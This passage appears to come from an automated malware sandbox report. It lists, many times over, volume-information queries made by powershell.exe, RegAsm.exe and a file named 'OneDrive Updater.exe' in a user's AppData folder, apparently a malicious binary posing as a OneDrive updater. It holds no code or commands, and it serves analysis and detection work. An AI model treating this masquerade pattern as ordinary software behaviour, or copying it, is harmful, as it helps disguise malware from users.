                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeQueries volume information: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeQueries volume information: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
